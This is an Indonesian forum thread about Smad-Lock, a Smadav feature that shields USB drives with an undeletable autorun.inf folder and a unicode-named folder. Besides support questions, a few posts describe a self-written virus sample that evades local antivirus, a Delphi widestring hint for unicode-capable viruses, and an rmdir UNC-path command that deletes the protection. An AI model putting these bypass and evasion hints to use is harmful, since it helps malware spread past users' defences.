Judul: Re: Smad-Lock
Ditulis oleh: CAH SMK NS KEMIRI pada Oktober 26, 2009, 07:07:36 PM
mantep ga tembus ama virus aman datanya :-bd
Judul: Re: Smad-Lock
Ditulis oleh: darkbite pada Oktober 26, 2009, 08:44:38 PM
4. Kinerja smad-lock. pertama2 saya agak sepele, krna folder smad-lock gampang di delete, tapi setelah liat folder autorun.inf baru percaya, virus ini ga bsa menambah kan autorun.inf krna uda ada autorun,inf tpi berupa folder*keknya teknik ini pernah saya baca di blog org* dan untuk mendelete file tsb harus memformat fd  :D

Smad-Lock memang sangat sulit di-delete, Semua program (termasuk virus) juga tidak bisa men-delete folder autorun.inf ini dengan cara biasa, ada cara khusus yang cukup rumit untuk men-delete-nya.

gan, folder autorun.inf bisa dihapus dgn mudah lewat software unlocker - http://ccollomb.free.fr/unlocker

coba pke ini http://forum.smadav.net/index.php?action=dlattach;topic=268.0;attach=830
klo mw biar ga bs diapus pke unlocker (kcuali di drive dgn file system NTFS) ;D

thanks gan, dicoba dulu...
Judul: Re: Smad-Lock
Ditulis oleh: izul pada Oktober 27, 2009, 08:49:48 AM
mantep ga tembus ama virus aman datanya :-bd

sdh bsa dtembus ko bro,.tp sya ga brmksud bqn virus,cma bwt blajar aj,no ofense...kpn2 dh diuplod..  ;)
Judul: Re: Smad-Lock
Ditulis oleh: CAH SMK NS KEMIRI pada Oktober 27, 2009, 10:44:35 PM
mantep ga tembus ama virus aman datanya :-bd

sdh bsa dtembus ko bro,.tp sya ga brmksud bqn virus,cma bwt blajar aj,no ofense...kpn2 dh diuplod..  ;)
tembusnya gmana tu bos bisa jlsin ga ???
Judul: Re: Smad-Lock
Ditulis oleh: izul pada Oktober 28, 2009, 04:16:15 PM
tembus bsa masuk virus mksudnya n bca smwa isi/file yg ad di dlm folder unicode..
intinya virus ini dibwt agr support unicode jg..(n folder2 sprti con/aux/nul dll jg ikt terduplikat jd con.exe/nul.exe/aux.exe)
tpi sya g sebar, ini cma sample aj, lgian jg blm slse bwtnya..  ;)

brhasil mmbwt dupikat di semua folder unicode/ non,,
pke tool "UNICODE Folder v1.0" http://forum.smadav.net/index.php?topic=268.300 bwt ngeset smwa folder jd unicode (skr sdh v1.5, sdh byk pnmbhaan lain..)  :D

krna smadav blm mndteksinya jd sy pke fitur 1 virus by user,..ni SS nya...  :)
Judul: Re: Smad-Lock
Ditulis oleh: Zai pada Oktober 28, 2009, 04:39:46 PM
tembus bsa masuk virus mksudnya n bca smwa isi/file yg ad di dlm folder unicode..
intinya virus ini dibwt agr support unicode jg..(n folder2 sprti con/aux/nul dll jg ikt terduplikat jd con.exe/nul.exe/aux.exe)
tpi sya g sebar, ini cma sample aj, lgian jg blm slse bwtnya..  ;)

brhasil mmbwt dupikat di semua folder unicode/ non,,
pke tool "UNICODE Folder v1.0" http://forum.smadav.net/index.php?topic=268.300 bwt ngeset smwa folder jd unicode (skr sdh v1.5, sdh byk pnmbhaan lain..)  :D

krna smadav blm mndteksinya jd sy pke fitur 1 virus by user,..ni SS nya...  :)

Ya, sepertinya kurang dari 1% programmer virus di Indonesia yang bisa membuat virus yang bisa menembus folder unicode :D
Judul: Re: Smad-Lock
Ditulis oleh: izul pada Oktober 28, 2009, 05:21:23 PM
tembus bsa masuk virus mksudnya n bca smwa isi/file yg ad di dlm folder unicode..
intinya virus ini dibwt agr support unicode jg..(n folder2 sprti con/aux/nul dll jg ikt terduplikat jd con.exe/nul.exe/aux.exe)
tpi sya g sebar, ini cma sample aj, lgian jg blm slse bwtnya..  ;)

brhasil mmbwt dupikat di semua folder unicode/ non,,
pke tool "UNICODE Folder v1.0" http://forum.smadav.net/index.php?topic=268.300 bwt ngeset smwa folder jd unicode (skr sdh v1.5, sdh byk pnmbhaan lain..)  :D

krna smadav blm mndteksinya jd sy pke fitur 1 virus by user,..ni SS nya...  :)

Ya, sepertinya kurang dari 1% programmer virus di Indonesia yang bisa membuat virus yang bisa menembus folder unicode :D

Ya bnr mas, blm ada mmng virus di Indonesia yg sdh support unicode..
ini cma iseng aj dan g akn sya sebar,percuma cz psti kedetek smadav cpt/lmbat (skr si msh gk kedetek dgn smadav,ansav n pcmav), mnding bqn progrm laen..  ;)

Dgn teknik folder unicode ini mmng VM lokal hrs mmutar otak lgi biar virus2nya support unicode..
Dan akhirnya cma 2 kmungkinan bwt para VM di indonesia, yg pertma mreka mundur dari dunia per-virusan ato maju terus dgn munculnya virus2 generasi baru yg suport unicode, yg tntunya akn mnjadi tntangan bgi smadav.... :)
Judul: Re: Smad-Lock
Ditulis oleh: izul pada Oktober 28, 2009, 05:26:31 PM
@darkbite
gmn bro dh coba blm, bs diapus g pke unlocker...klo mw tw cra proteksinya cb cari2 aj di tread ini, dh sya ksh tw ko trik/cranya.. ;)
Judul: Re: Smad-Lock
Ditulis oleh: Jastis pada November 02, 2009, 03:46:55 PM
tembus bsa masuk virus mksudnya n bca smwa isi/file yg ad di dlm folder unicode..
intinya virus ini dibwt agr support unicode jg..(n folder2 sprti con/aux/nul dll jg ikt terduplikat jd con.exe/nul.exe/aux.exe)
tpi sya g sebar, ini cma sample aj, lgian jg blm slse bwtnya..  ;)

brhasil mmbwt dupikat di semua folder unicode/ non,,
pke tool "UNICODE Folder v1.0" http://forum.smadav.net/index.php?topic=268.300 bwt ngeset smwa folder jd unicode (skr sdh v1.5, sdh byk pnmbhaan lain..)  :D

krna smadav blm mndteksinya jd sy pke fitur 1 virus by user,..ni SS nya...  :)

Ya, sepertinya kurang dari 1% programmer virus di Indonesia yang bisa membuat virus yang bisa menembus folder unicode :D

Ya bnr mas, blm ada mmng virus di Indonesia yg sdh support unicode..
ini cma iseng aj dan g akn sya sebar,percuma cz psti kedetek smadav cpt/lmbat (skr si msh gk kedetek dgn smadav,ansav n pcmav), mnding bqn progrm laen..  ;)

Dgn teknik folder unicode ini mmng VM lokal hrs mmutar otak lgi biar virus2nya support unicode..
Dan akhirnya cma 2 kmungkinan bwt para VM di indonesia, yg pertma mreka mundur dari dunia per-virusan ato maju terus dgn munculnya virus2 generasi baru yg suport unicode, yg tntunya akn mnjadi tntangan bgi smadav.... :)

kedepannya juga pasti akan ada virus maker yg berhasil menembus system unicode...
Judul: Re: Smad-Lock
Ditulis oleh: Ran_TH pada November 02, 2009, 04:14:11 PM
Usul, gimana kalo nama file readme di folder smadlock namanya "BACA DULU.txt" ato sejenisnya agar lbh menarik perhatian.
Judul: Re: Smad-Lock
Ditulis oleh: Zai pada November 02, 2009, 05:13:18 PM
Usul, gimana kalo nama file readme di folder smadlock namanya "BACA DULU.txt" ato sejenisnya agar lbh menarik perhatian.

Usul diterima ;)
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada November 03, 2009, 12:06:46 PM
Usul, gimana kalo nama file readme di folder smadlock namanya "BACA DULU.txt" ato sejenisnya agar lbh menarik perhatian.

Usul diterima ;)
Mungkin waktu smadav pertama kali dijalankan muncul message dgn isi : apakah anda telah setuju menggunakan smadav ??? Baca file readme...... :D
Judul: Re: Smad-Lock
Ditulis oleh: ViGunZ pada November 14, 2009, 08:21:13 PM
Smadav Lock keinject Worm, bagaimana Pendapatnya. Detect oleh Bitdefender TS 2009
Judul: Re: Smad-Lock
Ditulis oleh: laharl-san pada November 14, 2009, 08:29:30 PM
Sebetulnya smadav keren, tapi fiturnya masih ada beberapa bug, kalau diperbaiki mungkin akan menjadi antivirus yang kaya fitur, menarik, dan berkualitas internasional. Smad-locknya lebih baik diperbaiki bugnya+ditambah Smad-Unlock, jadi flashdisk yang udah ke-inject bisa dibalikin, ga kaya panda antivirus yang cuman bisa memberi vaksinasi tanpa memberi de-vaksinasi  :-bd
Judul: Re: Smad-Lock
Ditulis oleh: Ajojing pada November 14, 2009, 09:20:04 PM
@ViGunZ
folder autorun.inf bisa di bilang masih berupa forlder biasa, tpi ga bsa di hapus dgn mudah(sehingga virus2 tdk bsa mmbuat autorun.inf)
sedangkan folder Δ Smad-lock Δ adalah gunannya melindungi file yg ada di dalam folder Δ Smad-lock Δ, jdi file2 di luar itu baru berkemungkinan terinfeksi ;)

Baca aja readme smad-lock
Judul: Re: Smad-Lock
Ditulis oleh: ViGunZ pada November 14, 2009, 09:25:44 PM
thanks Infonya  :-bd
Judul: Re: Smad-Lock
Ditulis oleh: Astbat pada November 21, 2009, 05:42:28 PM
Apa Virus Berbahaya seperti conficker tembus ama Smadlock
Judul: Re: Smad-Lock
Ditulis oleh: Ajojing pada November 22, 2009, 01:24:42 AM
Apa Virus Berbahaya seperti conficker tembus ama Smadlock
klo uda trpasang smad-lock virusnya ga bsa nyebar
tpi virus msih bsa masuk yg ke ufd, tpi ga bakalan jalan krna tdk bsa membuat file autorun sndiri krna udah ada autorun.inf pnya smad lock, kecuali di jalankan oleh user sndiri :D jadi file virus di ufd tsb hanya junk biasa :D ;)
Judul: Re: Smad-Lock
Ditulis oleh: pdc_romeo pada November 22, 2009, 05:32:41 AM
Apa Virus Berbahaya seperti conficker tembus ama Smadlock
klo uda trpasang smad-lock virusnya ga bsa nyebar
tpi virus msih bsa masuk yg ke ufd, tpi ga bakalan jalan krna tdk bsa membuat file autorun sndiri krna udah ada autorun.inf pnya smad lock, kecuali di jalankan oleh user sndiri :D jadi file virus di ufd tsb hanya junk biasa :D ;)

And gampang kelihatan ... tinggal di delete aja... ya ngga bro...
Judul: Re: Smad-Lock
Ditulis oleh: Qie.aja pada November 22, 2009, 05:55:55 PM
Kemaren Q ngalamin FD yg di Lock pke smadLock, ga bisa di unlock lg.. knp ya..?
Klo di unlock malah hasilnya semi-Locked..
Judul: Re: Smad-Lock
Ditulis oleh: izul pada November 23, 2009, 11:12:52 AM
Kemaren Q ngalamin FD yg di Lock pke smadLock, ga bisa di unlock lg.. knp ya..?
Klo di unlock malah hasilnya semi-Locked..

Cb hapus pke unlocker folder autorun.inf nya.. kmungkinan foldernya msh ad mknya sttusnya semi-Locked..
Judul: Re: Smad-Lock
Ditulis oleh: stella_theos pada November 23, 2009, 10:12:40 PM
mas, folder d FD saya yang tadinya namanya UMN kok tiba2 berubah jadi Δ Smad-Lock Δ?? padahal saya gak pernah install smadav tuh.. udah gitu isi di dalamnya ga bisa dibuka.. malah berubah filenamenya jadi kotak-kotak gitu.. :(

terus saya install smadav setelah search di inet apa itu smad lock.. dan saya coba unlock FD saya, tapi koq ga ngaruh ya?
kemana ilangnya tuh file2 saya? soalnya folder yg berubah namanya jadi smad lock itu isinya materi kuliah saya semua dan belom sempet d backup.. gimana ya mas?

(sebelumnya sih saya baru cetak foto di Fuji Film yang datanya dari FD ini.. apa dari sini asalnya ya?)

thx b4 neh.. :-bd
Judul: Re: Smad-Lock
Ditulis oleh: stella_theos pada November 23, 2009, 10:38:49 PM
mas, folder d FD saya yang tadinya namanya UMN kok tiba2 berubah jadi Δ Smad-Lock Δ?? padahal saya gak pernah install smadav tuh.. udah gitu isi di dalamnya ga bisa dibuka.. malah berubah filenamenya jadi kotak-kotak gitu.. :(

terus saya install smadav setelah search di inet apa itu smad lock.. dan saya coba unlock FD saya, tapi koq ga ngaruh ya?
kemana ilangnya tuh file2 saya? soalnya folder yg berubah namanya jadi smad lock itu isinya materi kuliah saya semua dan belom sempet d backup.. gimana ya mas?

(sebelumnya sih saya baru cetak foto di Fuji Film yang datanya dari FD ini.. apa dari sini asalnya ya?)

thx b4 neh.. :-bd

mas, setelah saya utak-atik, ternyata foldernya bukan keganti sama Δ Smad-Lock Δ, tapi banyak folder saya yang ke hidden dengan sendirinya.. jadi folder2 itu udah ketemu lagi..
tapi koq isi folder Δ Smad-Lock Δ itu tetap sama? banyak kotak2 gitu? jadi folder Δ Smad-Lock Δ ini gimana cara pakenya ya mas?  :)
Judul: Re: Smad-Lock
Ditulis oleh: Qie.aja pada November 23, 2009, 10:46:42 PM
jadi folder Δ Smad-Lock Δ ini gimana cara pakenya ya mas?  :)
di folder smad lock itu kan ad file read me nya,, silahkan di baca...
Klo misalkan ga mau ad fioldernya smadLocknya du hapus jg gapapa...:D
Judul: Re: Smad-Lock
Ditulis oleh: meong pada November 26, 2009, 04:35:02 AM
tembus bsa masuk virus mksudnya n bca smwa isi/file yg ad di dlm folder unicode..
intinya virus ini dibwt agr support unicode jg..(n folder2 sprti con/aux/nul dll jg ikt terduplikat jd con.exe/nul.exe/aux.exe)
tpi sya g sebar, ini cma sample aj, lgian jg blm slse bwtnya..  ;)

brhasil mmbwt dupikat di semua folder unicode/ non,,
pke tool "UNICODE Folder v1.0" http://forum.smadav.net/index.php?topic=268.300 bwt ngeset smwa folder jd unicode (skr sdh v1.5, sdh byk pnmbhaan lain..)  :D

krna smadav blm mndteksinya jd sy pke fitur 1 virus by user,..ni SS nya...  :)

Ya, sepertinya kurang dari 1% programmer virus di Indonesia yang bisa membuat virus yang bisa menembus folder unicode :D

Ya bnr mas, blm ada mmng virus di Indonesia yg sdh support unicode..
ini cma iseng aj dan g akn sya sebar,percuma cz psti kedetek smadav cpt/lmbat (skr si msh gk kedetek dgn smadav,ansav n pcmav), mnding bqn progrm laen..  ;)

Dgn teknik folder unicode ini mmng VM lokal hrs mmutar otak lgi biar virus2nya support unicode..
Dan akhirnya cma 2 kmungkinan bwt para VM di indonesia, yg pertma mreka mundur dari dunia per-virusan ato maju terus dgn munculnya virus2 generasi baru yg suport unicode, yg tntunya akn mnjadi tntangan bgi smadav.... :)

kedepannya juga pasti akan ada virus maker yg berhasil menembus system unicode...

apakah unicode sesulit itu ??? keknya tidak deh... nah misalnya bagi yang buat virusnya menggunakan delphi 2009 keatas akan lebih gampang... nah intinya hanya bermain di widestring
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada November 26, 2009, 11:31:48 AM
Apa Virus Berbahaya seperti conficker tembus ama Smadlock
Ga bakalan bisa bikin autorun di FD yg ada smad-locknya, dia ibaratnya cuma numpang junk doank di FD dengan membuat folder RECYCLER. Dan di dalamnya terdapat folder yg namanya acak sekaligus file virusnya.....Tapi ga bisa jalan otomatis, dan apabila di scan pake smadav maka langsung akan dihapus virusnya.......
Judul: Re: Smad-Lock
Ditulis oleh: Ajojing pada November 26, 2009, 03:59:24 PM
Apa Virus Berbahaya seperti conficker tembus ama Smadlock
klo uda trpasang smad-lock virusnya ga bsa nyebar
tpi virus msih bsa masuk yg ke ufd, tpi ga bakalan jalan krna tdk bsa membuat file autorun sndiri krna udah ada autorun.inf pnya smad lock, kecuali di jalankan oleh user sndiri :D jadi file virus di ufd tsb hanya junk biasa :D ;)

And gampang kelihatan ... tinggal di delete aja... ya ngga bro...
yoii :)
mas, folder d FD saya yang tadinya namanya UMN kok tiba2 berubah jadi Δ Smad-Lock Δ?? padahal saya gak pernah install smadav tuh.. udah gitu isi di dalamnya ga bisa dibuka.. malah berubah filenamenya jadi kotak-kotak gitu.. :(

terus saya install smadav setelah search di inet apa itu smad lock.. dan saya coba unlock FD saya, tapi koq ga ngaruh ya?
kemana ilangnya tuh file2 saya? soalnya folder yg berubah namanya jadi smad lock itu isinya materi kuliah saya semua dan belom sempet d backup.. gimana ya mas?

(sebelumnya sih saya baru cetak foto di Fuji Film yang datanya dari FD ini.. apa dari sini asalnya ya?)

thx b4 neh.. :-bd
cobak scan lagi dgn smadav, kemungkinan folder2 yg ke hidden akan kembali attributnya ke normal, kemungkinan folder smad-lock krna komp tempat nyuci fotonya pke smadav :D

mas, setelah saya utak-atik, ternyata foldernya bukan keganti sama Δ Smad-Lock Δ, tapi banyak folder saya yang ke hidden dengan sendirinya.. jadi folder2 itu udah ketemu lagi..
tapi koq isi folder Δ Smad-Lock Δ itu tetap sama? banyak kotak2 gitu? jadi folder Δ Smad-Lock Δ ini gimana cara pakenya ya mas?  :)
kotak2? cobak upload kan SSnya :D
Judul: Re: Smad-Lock
Ditulis oleh: izul pada November 26, 2009, 09:29:59 PM
mas, setelah saya utak-atik, ternyata foldernya bukan keganti sama Δ Smad-Lock Δ, tapi banyak folder saya yang ke hidden dengan sendirinya.. jadi folder2 itu udah ketemu lagi..
tapi koq isi folder Δ Smad-Lock Δ itu tetap sama? banyak kotak2 gitu? jadi folder Δ Smad-Lock Δ ini gimana cara pakenya ya mas?  :)
kotak2? cobak upload kan SSnya :D

disk error mungkin.. cb cek disk aja lwt command prompt.

klik START - RUN - ketik : CMD /K CHKDSK X: /F
X ==> drive FD nya..  :)
Judul: Re: Smad-Lock
Ditulis oleh: ★ harboot ★ pada November 26, 2009, 10:05:02 PM
uda lama gak pakai smad-lock,,,
tp akhir2 ini sering lihat smad-lock di flashdisk2 teman,,
artinya smadav uda nyebar dikampuz,,, haha
Judul: Re: Smad-Lock
Ditulis oleh: ohmtyo pada November 28, 2009, 12:59:01 PM
Δ Smad-Lock Δ & autorun.inf bisa dihapus dgn modal cmd.exe
Judul: Re: Smad-Lock
Ditulis oleh: shinichi pada November 28, 2009, 01:02:00 PM
klo mw unlock smadlock

pakai smadav terus pilih tools ---> pilih smadlock ----> terus unlock

^^
Judul: Re: Smad-Lock
Ditulis oleh: ohmtyo pada November 28, 2009, 01:25:11 PM
bukan mau unlock bozz, sekedar penasaran ,katanya sulit menghapus folder Δ Smad-Lock Δ & autorun.inf, ternyata sangat mudah hanya dgn perintah cmd.exe, jadi ngga perlu pake unlocker atau sejenisnya, 
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada November 28, 2009, 01:30:00 PM
bukan mau unlock bozz, sekedar penasaran ,katanya sulit menghapus folder Δ Smad-Lock Δ & autorun.inf, ternyata sangat mudah hanya dgn perintah cmd.exe, jadi ngga perlu pake unlocker atau sejenisnya, 
Kalo yg tau apa yg harus ditulis di CMDnya mungkin bisa.......
Kalo yg ga tau????
Judul: Re: Smad-Lock
Ditulis oleh: ohmtyo pada November 28, 2009, 01:37:44 PM
maksudnya gimana om Joris, salam kenal
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada November 28, 2009, 01:41:50 PM
maksudnya gimana om Joris, salam kenal
Maksudnya kalo yg tau tulis scriptnya di CMD sih gpp...Kan harus pake script kan buat bisa unlock?
Kalo yg ga biasa pake CMD gimana?
Kan harus tau dulu caranya, mending kaya yg dianjurkan bro shinichi........ :-bd
Lebih mudah......
Judul: Re: Smad-Lock
Ditulis oleh: Jastis pada November 28, 2009, 01:45:02 PM
bukan mau unlock bozz, sekedar penasaran ,katanya sulit menghapus folder Δ Smad-Lock Δ & autorun.inf, ternyata sangat mudah hanya dgn perintah cmd.exe, jadi ngga perlu pake unlocker atau sejenisnya, 

emang sudah bisa dihapus menggunakan script..saya kemarin sudah keliling forum underground dan mereka mebahas ini juga..trus gw copy tuh script dan coba emang ternyata bisa....
Judul: Re: Smad-Lock
Ditulis oleh: Ĵŏřĩş™ pada November 28, 2009, 01:50:34 PM
bukan mau unlock bozz, sekedar penasaran ,katanya sulit menghapus folder Δ Smad-Lock Δ & autorun.inf, ternyata sangat mudah hanya dgn perintah cmd.exe, jadi ngga perlu pake unlocker atau sejenisnya, 

emang sudah bisa dihapus menggunakan script..saya kemarin sudah keliling forum underground dan mereka mebahas ini juga..trus gw copy tuh script dan coba emang ternyata bisa....
Iya kan, kalo yg dimaksud ohmtyo mungkin bagi yg biasa menggunakan CMD.
Kalo yg ga tau kan mending pake smadavnya langsung....... :-\
Judul: Re: Smad-Lock
Ditulis oleh: ohmtyo pada November 28, 2009, 02:01:31 PM
oke dech, saya tunggu perkembangan SMADAV selanjutnya,     :)
Judul: Re: Smad-Lock
Ditulis oleh: HyperLinx pada November 28, 2009, 07:18:10 PM
langsung saja ketik di cmd seperti cara smadav rmdir \\.\X:\autorun.inf\con\aux\nul\dll\dsb  :-[
Judul: Re: Smad-Lock
Ditulis oleh: Deny MiniDwarf pada November 29, 2009, 01:02:30 PM
gawat donk kalo gini...smad-lock jadi mudah di eksploitasi..apa gak masa;ah nih mas zai?
Judul: Re: Smad-Lock
Ditulis oleh: izul pada November 29, 2009, 04:20:00 PM
langsung saja ketik di cmd seperti cara smadav rmdir \\.\X:\autorun.inf\con\aux\nul\dll\dsb  :-[

Y bnr, ckup dgn nmbahin \\.\ ato \\?\ (UNC path) didpan nm drive bs digunain bwt ngapus folder2 sprti con,aux,nul dgn mdh.. sbnrnya jg udh dibhas cra ini.

gawat donk kalo gini...smad-lock jadi mudah di eksploitasi..apa gak masa;ah nih mas zai?

mnurut sya ga trlalu msalah sbnrnya.. toh klo qta colokin di komp yg sdh ad smadavnya kan otomatis lgsung dibuat lgi folder autorun.inf nya,.

tp beda klo di komptnya autorun blm dimatiin. prnh sya cb mna yg lbh cpt script autorun.inf yg jlan ato smad-lock, trnyta autorun nya lbh cpt.. :)
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Zai pada November 30, 2009, 11:14:04 PM
Karena banyaknya user yang bingung dengan kegunaan Smad-Lock (mungkin karena malas membaca readme di dalamnya),
Sekarang folder Δ Smad-Lock Δ berubah nama jadi folder Δ Smad-Lock (Brankas Smadav) Δ

@all
Gimana tanggapannya?
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Ĵŏřĩş™ pada November 30, 2009, 11:19:03 PM
Karena banyaknya user yang bingung dengan kegunaan Smad-Lock (mungkin karena malas membaca readme di dalamnya),
Sekarang folder Δ Smad-Lock Δ berubah nama jadi folder Δ Smad-Lock (Brankas Smadav) Δ

@all
Gimana tanggapannya?
Kepanjangan aja bro namanya..........
Sebetulnya Δ Smad-Lock Δ aja udah bagus...Cuma mungkin bagi sebagian org sering mempermasalahkannya......
Gmana kalo namanya cuma Δ Smad-Secure Δ ???
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: ★ harboot ★ pada November 30, 2009, 11:24:45 PM
ya udah smad-lock ajaaa,, jgn ditambah2,,
tp penyuluhannya lbh gencar,, coz jadi panjang klo ditambah,,

dihalaman about ada tambahan help tentang fitur smadav,,
jrg org mau buka notepad,,
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Zai pada November 30, 2009, 11:47:15 PM
ya udah smad-lock ajaaa,, jgn ditambah2,,
tp penyuluhannya lbh gencar,, coz jadi panjang klo ditambah,,

dihalaman about ada tambahan help tentang fitur smadav,,
jrg org mau buka notepad,,

Sudah diterapkan kok di Rev. 7.4 ini, coba cek FD nya :D
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: ★ harboot ★ pada November 30, 2009, 11:47:57 PM
gak punya fdisk,,
cek pake apa yaaa?? hmmm,,
mmc bs? heheee
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: valtz pada Desember 01, 2009, 09:00:54 AM
oke dah gaan!!!
tp keren seh brankas smadav
btw brankas smdav bisa dibobol ga ya?
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Zai pada Desember 01, 2009, 11:34:03 AM
Akhirnya pengguna awam sudah mengerti apa itu Smad-Lock = Brankas Smadav :D
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: ViGunZ pada Desember 01, 2009, 11:36:22 AM
Akhirnya pengguna awam sudah mengerti apa itu Smad-Lock = Brankas Smadav :D

Unik juga namanya Smad-Lock = Brankas Smadav   :-X
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Jastis pada Desember 01, 2009, 11:47:03 AM
Akhirnya pengguna awam sudah mengerti apa itu Smad-Lock = Brankas Smadav :D

[ask]

Kenapa file yg didalam Smad-lock akan hilang bila kita update smadav ?
ada solusi ?
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Zai pada Desember 01, 2009, 11:50:33 AM
Akhirnya pengguna awam sudah mengerti apa itu Smad-Lock = Brankas Smadav :D

[ask]

Kenapa file yg didalam Smad-lock akan hilang bila kita update smadav ?
ada solusi ?

Harusnya gak hilang, mungkin salah paham aja ;)

Coba cari sebab lainnya
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Jastis pada Desember 01, 2009, 11:56:38 AM
Akhirnya pengguna awam sudah mengerti apa itu Smad-Lock = Brankas Smadav :D

[ask]

Kenapa file yg didalam Smad-lock akan hilang bila kita update smadav ?
ada solusi ?

Harusnya gak hilang, mungkin salah paham aja ;)

Coba cari sebab lainnya

gak juga mas...gw dah dua kali mengalami hal ini,pertama di rev 7.0 ke rev 7.1 klo gk salah trus sekarang terjadi lagi di rev 7.3 ke rev 7.4....ini terjadi di Flashdisk....Filenya Word...
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Zai pada Desember 01, 2009, 12:05:00 PM
@Jastis
Menurut teorinya tidak, saya tidak mungkin melawan teori :D
Dan menurut hasil tes juga harusnya tidak hilang.

Jadi ada faktor lain disana yang harus diketahui
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: MiloMen™ pada Desember 01, 2009, 12:11:11 PM
Karena banyaknya user yang bingung dengan kegunaan Smad-Lock (mungkin karena malas membaca readme di dalamnya),
Sekarang folder Δ Smad-Lock Δ berubah nama jadi folder Δ Smad-Lock (Brankas Smadav) Δ

@all
Gimana tanggapannya?

Kalo menurut saya cukup ΔSmad-Brankas SmadavΔ atau ΔBrankas SmadavΔ saja, gimana?
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Jastis pada Desember 01, 2009, 12:13:45 PM
 Apa ya penyebabnya ?

Coba saya test lagi nanti apa penyebabnya...... ;)
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: izul pada Desember 03, 2009, 06:46:23 PM
Akhirnya pengguna awam sudah mengerti apa itu Smad-Lock = Brankas Smadav :D

[ask]

Kenapa file yg didalam Smad-lock akan hilang bila kita update smadav ?
ada solusi ?

ga hilang ko bro,. klopun kita unlock smad-lock-nya yg dihpus itu cma folder autorun.inf nya, folder uncodenya gk ikut dihapus ;)
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Jastis pada Desember 03, 2009, 06:51:04 PM
Akhirnya pengguna awam sudah mengerti apa itu Smad-Lock = Brankas Smadav :D

[ask]

Kenapa file yg didalam Smad-lock akan hilang bila kita update smadav ?
ada solusi ?

ga hilang ko bro,. klopun kita unlock smad-lock-nya yg dihpus itu cma folder autorun.inf nya, folder uncodenya gk ikut dihapus ;)

thank atas masukkannya......emg ada kesalahan di FD gw....
saya sudah coba dan emg gak hilng//////
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: MathZ pada Desember 05, 2009, 01:56:28 PM
Akhirnya pengguna awam sudah mengerti apa itu Smad-Lock = Brankas Smadav :D

[ask]

Kenapa file yg didalam Smad-lock akan hilang bila kita update smadav ?
ada solusi ?
masa sih gan? di gw aman2 aja. malah ada dua folder.
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: descrates pada Desember 05, 2009, 08:45:42 PM
ya seperti yang diberitakan para senior, brankas smadav tetap bisa kena eliminasi

1. UFD sistemnya NTFS
2. OS tidak menggunakan encoding default language 1033 (english US), misalnya diganti arabic etc

pastinya tembus juga ama virus, hehehehe mungkin harus ada alternatif lain???
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: izul pada Desember 11, 2009, 09:31:14 PM
kynya byk thread yg isinya hmpir sma ttg smad-lock ini, g jauh blg folder smadlock tembus/bobol/jebol ma virus.. diulang2 mulu, jdi bosen...hahaha

Yg prlu diktahui klo folder unicode smadlock itu tidak bsa menjamin 100% aman dari virus, krna seiring prkembangannya virus byk jg yg sdh dicoding agr suport unicode, tp tntunya tdk sebyak virus2 umumnya (mungkin bru 2 dari 10 virus lokal yg sdh suport unicode)..tp ttp aj folder tnpa krakter unicode pnya peluang lbh bsar ter-infect virus.. ;)


saran: utk file autorun.inf yg ad di FD klo bs jgn didelete pas mw me-replacenya dgn folder smadlock, ckup di rename aj (ex:autorun.inf.txt).. stlah dpkir2 mungkin ad bnarnya usul dari om xstarlogic bbrpa wktu lalu (sy jg bru ngalamin soalnya, wlopun pnya file backup tp agk trganggu jg).. :)
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: piechan pada Desember 12, 2009, 08:31:01 AM
Cgmn caranya unlock smad-lock nya mas?
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Jastis pada Desember 12, 2009, 09:36:38 AM
Cgmn caranya unlock smad-lock nya mas?

Masuk ke setting Smadav,trus hilangkan tanda centang di Active Smad-Lock when Flashdisk plugged [aktifkan flashdisk sewaktu dicolokkin.
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Ran_TH pada Desember 13, 2009, 11:17:56 AM
Ada pengguna Linux di Facebook yang mengeluh folder Smad-Lock di FD-nya tidak bisa dihapus. FD-nya dipinjamkan oleh temannya, dan ketika balik sudah ada folder ini didalam FD-nya.

Beginilah, walaupun maksud Smad-Lock baik tapi orang kebanyakan tidak mengerti apa gunanya ??? banyak yang bilang di Facebook SmadLock sangat mengganggu.
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Jastis pada Desember 13, 2009, 09:07:52 PM
seharusnya klo smad-lock gak susah menghapusnya...terkecuali autorun.inf smadav.... :D
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: ★ harboot ★ pada Desember 14, 2009, 10:32:38 AM
buat file txt berisi keterangan smadlock didalam smadlock (autorun dan folder smadav,,)
biar user awam tau apa guna smadlock,, umumnya yg orang tau autorun itu buat virus,,
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: Ran_TH pada Desember 14, 2009, 02:39:17 PM
seharusnya klo smad-lock gak susah menghapusnya...terkecuali autorun.inf smadav.... :D
Iya sih...tapi katanya dia susah melakukannya kalo di Linux ???
Judul: Re: Smad-Lock (Brankas Smadav)
Ditulis oleh: ★ harboot ★ pada Desember 14, 2009, 09:15:27 PM
